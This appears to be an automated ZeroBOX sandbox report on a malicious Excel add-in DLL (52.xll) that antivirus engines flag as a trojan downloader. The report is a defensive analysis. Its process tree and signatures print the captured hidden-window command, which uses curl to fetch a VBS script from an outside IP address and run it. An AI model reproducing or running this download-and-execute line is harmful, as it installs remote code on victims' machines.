Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Oct. 4, 2023, 10:40 a.m.	Oct. 4, 2023, 10:43 a.m.

Size	50.0KB
Type	PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
MD5	`fdbe1d30cc4a01948fe99be1159bbb5d`
SHA256	`f487ddbc921e3def921e18b2790c19af1a8ba09cd531e51df7861a637b40726d`
CRC32	`6455A19B`
ssdeep	`1536:F7pxSJsy6Nh5wFHssKjrtN/5jqzyCNwGXGhrxc45gwN:/YwNh5wFHssKXnxjNCNHG8wN`
Yara	PE_Header_Zero - PE File Signature IsDLL - (no description) IsPE64 - (no description)

rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\52.xll.dll,xlAutoOpen
2192
- rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\52.xll.dll,xlAutoOpen
  1564
  - default.exe c:\users\public\default.exe about:"<script>var b = new ActiveXObject("wscript.shell"); b.run('cmd /c C:\\Windows\\system32\\curl.exe -o c:\\users\\public\\123321.vbs http://207.246.78.68/6kQh/AQbK2&&timeout 10&&c:\\users\\public\\123321.vbs', 0); window.close();</script>"
    1716
    - cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\123321.vbs http://207.246.78.68/6kQh/AQbK2&&timeout 10&&c:\users\public\123321.vbs
      2740
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\52.xll.dll,xor_decrypt
2256
- rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\52.xll.dll,xor_decrypt
  1608
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\52.xll.dll,hash
3028
- rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\52.xll.dll,hash
  1652
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\52.xll.dll,
2392

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 4, 2023, 10:33 a.m.			0	0
IsDebuggerPresent Oct. 4, 2023, 10:33 a.m.			0	0
IsDebuggerPresent Oct. 4, 2023, 10:33 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Oct. 4, 2023, 10:33 a.m.	buffer: 'C:\Windows\system32\curl.exe' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x000000000000000b	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 4, 2023, 10:33 a.m.		1	1	0

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ Oct. 4, 2023, 10:33 a.m.	stacktrace: xlAutoOpen+0x9b90 52+0xb000 @ 0x7fef34ab000 rundll32+0x2f42 @ 0xff9a2f42 rundll32+0x3b7a @ 0xff9a3b7a BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521 exception.instruction_r: 78 c2 4a f3 fe 07 00 00 00 00 00 00 00 00 00 00 exception.instruction: js 0x7fef34aafc4 exception.exception_code: 0xc0000005 exception.symbol: xlAutoOpen+0x9b90 52+0xb000 exception.address: 0x7fef34ab000 registers.r14: 0 registers.r15: 0 registers.rcx: 196972 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 1178352 registers.r11: 1177440 registers.r8: 1950036 registers.r9: 10 registers.rdx: 4288282624 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 196972 registers.r13: 0	1	0	0
__exception__ Oct. 4, 2023, 10:33 a.m.	stacktrace: xlAutoOpen+0x99 hash-0x9af7 52+0x1509 @ 0x7fef34a1509 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 0x223e747069726373 exception.instruction_r: c3 90 90 90 90 90 90 48 83 ec 28 48 8b 05 f5 9a exception.instruction: ret exception.exception_code: 0xc0000005 exception.symbol: xlAutoOpen+0x99 hash-0x9af7 52+0x1509 exception.address: 0x7fef34a1509 registers.r14: 0 registers.r15: 0 registers.rcx: 48 registers.rsi: 0 registers.r10: 0 registers.rbx: 65908 registers.rsp: 2161072 registers.r11: 514 registers.r8: 2159240 registers.r9: 2159296 registers.rdx: 8796092887632 registers.r12: 3403660466342687599 registers.rbp: 2408704 registers.rdi: -1 registers.rax: 0 registers.r13: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Oct. 4, 2023, 10:33 a.m.

stacktrace:

xlAutoOpen+0x9b90 52+0xb000 @ 0x7fef34ab000
rundll32+0x2f42 @ 0xff9a2f42
rundll32+0x3b7a @ 0xff9a3b7a
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521

exception.instruction_r: 78 c2 4a f3 fe 07 00 00 00 00 00 00 00 00 00 00
exception.instruction: js 0x7fef34aafc4
exception.exception_code: 0xc0000005
exception.symbol: xlAutoOpen+0x9b90 52+0xb000
exception.address: 0x7fef34ab000
registers.r14: 0
registers.r15: 0
registers.rcx: 196972
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 1178352
registers.r11: 1177440
registers.r8: 1950036
registers.r9: 10
registers.rdx: 4288282624
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 196972
registers.r13: 0

__exception__

Oct. 4, 2023, 10:33 a.m.

stacktrace:

xlAutoOpen+0x99 hash-0x9af7 52+0x1509 @ 0x7fef34a1509
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373

exception.instruction_r: c3 90 90 90 90 90 90 48 83 ec 28 48 8b 05 f5 9a
exception.instruction: ret
exception.exception_code: 0xc0000005
exception.symbol: xlAutoOpen+0x99 hash-0x9af7 52+0x1509
exception.address: 0x7fef34a1509
registers.r14: 0
registers.r15: 0
registers.rcx: 48
registers.rsi: 0
registers.r10: 0
registers.rbx: 65908
registers.rsp: 2161072
registers.r11: 514
registers.r8: 2159240
registers.r9: 2159296
registers.rdx: 8796092887632
registers.r12: 3403660466342687599
registers.rbp: 2408704
registers.rdi: -1
registers.rax: 0
registers.r13: 0

Allocates read-write-execute memory (usually to unpack itself) (4 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 4, 2023, 10:33 a.m.	process_identifier: 1608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa1b7000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 4, 2023, 10:33 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa1b7000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 4, 2023, 10:33 a.m.	process_identifier: 1564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa1b7000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 4, 2023, 10:33 a.m.	process_identifier: 1716 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa1b7000 process_handle: 0xffffffffffffffff	1

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\123321.vbs http://207.246.78.68/6kQh/AQbK2&&timeout 10&&c:\users\public\123321.vbs

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Oct. 4, 2023, 10:33 a.m.	show_type: 0 filepath_r: cmd parameters: /c C:\Windows\system32\curl.exe -o c:\users\public\123321.vbs http://207.246.78.68/6kQh/AQbK2&&timeout 10&&c:\users\public\123321.vbs filepath: cmd	1	1	0

File has been identified by 7 AntiVirus engines on VirusTotal as malicious (7 events)

Symantec	ML.Attribute.HighConfidence
Kaspersky	VHO:Trojan-Downloader.Win32.Convagent.gen
Avast	Win64:TrojanX-gen [Trj]
Antiy-AVL	Trojan/Win32.Sabsik
ZoneAlarm	VHO:Trojan-Downloader.Win32.Convagent.gen
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
AVG	Win64:TrojanX-gen [Trj]

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 4, 2023, 10:33 a.m.	process_identifier: 1716 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x000007fffff90000 process_handle: 0xffffffffffffffff	1	0	0

52.xll

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All